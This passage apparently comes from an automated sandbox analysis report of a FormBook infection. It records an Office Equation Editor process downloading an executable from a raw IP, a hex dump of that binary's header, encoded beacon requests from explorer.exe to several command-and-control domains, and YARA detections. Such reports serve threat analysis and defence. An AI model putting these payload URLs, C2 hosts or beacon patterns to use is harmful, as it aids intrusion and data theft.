                                                                                                                                                        • www.essentiallyourscandles.com
                                                                                                                                                        • www.brunoecatarina.com
                                                                                                                                                        • www.zmzcrossrt.xyz
                                                                                                                                                        • www.cyrilgraze.com

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.22491673.36.53.5080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        May 13, 2021 08:29:30.839982986 CEST0OUTGET /dose/xele.exe HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                        Host: 3.36.53.50
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        May 13, 2021 08:29:31.134192944 CEST1INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 13 May 2021 06:29:20 GMT
                                                                                                                                                        Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                        Last-Modified: Thu, 13 May 2021 06:24:23 GMT
                                                                                                                                                        ETag: "1bf800-5c2302daaa325"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Length: 1832960
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d c5 9c 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e6 1b 00 00 10 00 00 00 00 00 00 92 05 1c 00 00 20 00 00 00 20 1c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 05 1c 00 4f 00 00 00 00 20 1c 00 d0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1c 00 0c 00 00 00 08 04 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 e5 1b 00 00 20 00 00 00 e6 1b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0c 00 00 00 20 1c 00 00 0e 00 00 00 e8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1c 00 00 02 00 00 00 f6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 05 1c 00 00 00 00 00 48 00 00 00 02 00 05 00 54 6d 04 00 34 8e 03 00 03 00 00 00 01 00 00 06 88 fb 07 00 80 08 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 08 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 21 07 00 06 28 34 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 1a 07 00 06 28 35 00 00 0a 00 2a 26 00 02 28 36 00 00 0a 00 2a ce 73 37 00 00 0a 80 01 00 00 04 73 38 00 00 0a 80 02 00 00 04 73 39 00 00 0a 80 03 00 00 04 73 3a 00 00 0a 80 04 00 00 04 73 3b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 40 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 41 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 42 00 00 0a 6f 43 00 00 0a 73 44 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}`P @ `@@O @ H.text `.rsrc @@.reloc@@BtHTm40(,(-(o.*(/(0(1(2(3*N(o!(4*N(o(5*&(6*s7s8s9s:s;*0~o<+*0~o=+*0~o>+*0~o?+*0~o@+*0<~(A,!rp(BoCsD~


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        1192.168.2.2249168156.241.53.16180C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        May 13, 2021 08:30:39.513780117 CEST1945OUTGET /p2io/?6lzd4R3=DTtQlm+ek3aiRXh2XrobrkMYYvpq+NlfspfnNNuMzI98GFQb/uTk0N0e6q4XVVELH/G/Eg==&Mj=8pGl2P HTTP/1.1
                                                                                                                                                        Host: www.hfjxhs.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        May 13, 2021 08:30:40.056502104 CEST1946INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                        Date: Thu, 13 May 2021 06:30:39 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Set-Cookie: PHPSESSID=s39c2d3g7e4n55ruh4qa6sh8m7; path=/
                                                                                                                                                        Upgrade: h2
                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                        Location: /
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Content-Type: text/html; charset=gbk


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        2192.168.2.224916923.227.38.7480C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        May 13, 2021 08:30:52.538312912 CEST1947OUTGET /p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P HTTP/1.1
                                                                                                                                                        Host: www.essentiallyourscandles.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        May 13, 2021 08:30:52.716888905 CEST1948INHTTP/1.1 403 Forbidden
                                                                                                                                                        Date: Thu, 13 May 2021 06:30:52 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        X-Sorting-Hat-PodId: 149
                                                                                                                                                        X-Sorting-Hat-ShopId: 48654778518
                                                                                                                                                        X-Dc: gcp-us-central1
                                                                                                                                                        X-Request-ID: 2b7b5b43-b163-4dda-a5cd-16cb6a76f56e
                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                        cf-request-id: 0a0604d39800002ba1a4913000000001
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 64e9d7328f842ba1-FRA
                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                                                                                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        3192.168.2.224917054.85.86.21180C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        May 13, 2021 08:30:57.953911066 CEST1954OUTGET /p2io/?6lzd4R3=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Mj=8pGl2P HTTP/1.1
                                                                                                                                                        Host: www.brunoecatarina.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        May 13, 2021 08:30:58.093216896 CEST1955INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 13 May 2021 06:30:58 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Set-Cookie: session=qqd6kohrrv32d3j3vlcr9e8hne; path=/; domain=.brunoecatarina.com; secure; SameSite=None
                                                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                                                        Connection: close
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Data Raw: 37 34 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 73 69 73 74 65 6d 61 2e 63 61 73 61 72 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 3d 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 43 61 73 61 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 4d 78 74 6d 44 57 69 41 4f 76 2d 53 75 34 7a 39 2d 73 55 41 79 4a 4a 4e 55 47 74 6c 68 79 56 42 4d 75 42 61 33 43 31 66 71 73 22 20 2f 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 6d 62 65 64 2e 74 79 70 65 66 6f 72 6d 2e 63 6f 6d 2f 65 6d 62 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 21 2d 2d 20 48 54 4d 4c 35 20 53 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 30 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 72 65 73 70 6f 6e 64 2e 6a 73 2f 31 2e 33 2e 30 2f 72 65 73 70 6f 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 21 2d 2d 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 73 61 72 2e 63 6f 6d 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 31 33 35 32 38 33 37 39 35 37 37 33 36 22 2f 3e 0a 3c 21 2d 2d 20 65 6e 64 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 0a 0a 20 20 20 20 20 20 3c 21 2d 2d 20 67 6f 6f 67 6c 65 20 61 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74
                                                                                                                                                        Data Ascii: 7438<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="//sistema.casar.com/favicon.ico?v=2" /><title>Pgina no encontrada | Casar.com</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="google-site-verification" content="GMxtmDWiAOv-Su4z9-sUAyJJNUGtlhyVBMuBa3C1fqs" /><script src="https://embed.typeform.com/embed.js"></script>... HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->...[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script><![endif]-->... open graph --> <meta property="og:site_name" content="Casar.com"/> <meta property="og:type" content="website"> <meta property="fb:app_id" content="621352837957736"/>... end open graph --> ... google analytics --><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyt


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        4192.168.2.224917175.2.66.24780C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        May 13, 2021 08:31:03.737710953 CEST1986OUTGET /p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P HTTP/1.1
                                                                                                                                                        Host: www.zmzcrossrt.xyz
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        May 13, 2021 08:31:04.017532110 CEST1986INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 13 May 2021 06:31:03 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 166
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: https://www.zmzcrossrt.xyz/p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        5192.168.2.2249172104.21.65.780C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        May 13, 2021 08:31:09.133264065 CEST1987OUTGET /p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P HTTP/1.1
                                                                                                                                                        Host: www.cyrilgraze.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        May 13, 2021 08:31:09.192511082 CEST1988INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Date: Thu, 13 May 2021 06:31:09 GMT
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                                        Expires: Thu, 13 May 2021 07:31:09 GMT
                                                                                                                                                        Location: https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P
                                                                                                                                                        cf-request-id: 0a0605146d00004e4a0117e000000001
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8tdnjQDnN9vLlbS%2FB2GC%2FexX71BapxCsYrrxNGR2RfPZR4QM7hOQP9rjbZTuMAGuVvFfnypHVA2U%2BLl2OKcG9XqKp5DHYZlcWnR2XJizjqOEoco%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 64e9d79a4e9e4e4a-FRA
                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:08:28:37
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                        Imagebase:0x13fd80000
                                                                                                                                                        File size:27641504 bytes
                                                                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:08:28:59
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:543304 bytes
                                                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:05
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                        Imagebase:0xb0000
                                                                                                                                                        File size:1832960 bytes
                                                                                                                                                        MD5 hash:92BD99870C4E2829F3E6D1B3B512067D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:08
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                        Imagebase:0xb0000
                                                                                                                                                        File size:1832960 bytes
                                                                                                                                                        MD5 hash:92BD99870C4E2829F3E6D1B3B512067D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:08
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                        Imagebase:0xb0000
                                                                                                                                                        File size:1832960 bytes
                                                                                                                                                        MD5 hash:92BD99870C4E2829F3E6D1B3B512067D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:09
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                        Imagebase:0xb0000
                                                                                                                                                        File size:1832960 bytes
                                                                                                                                                        MD5 hash:92BD99870C4E2829F3E6D1B3B512067D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:10
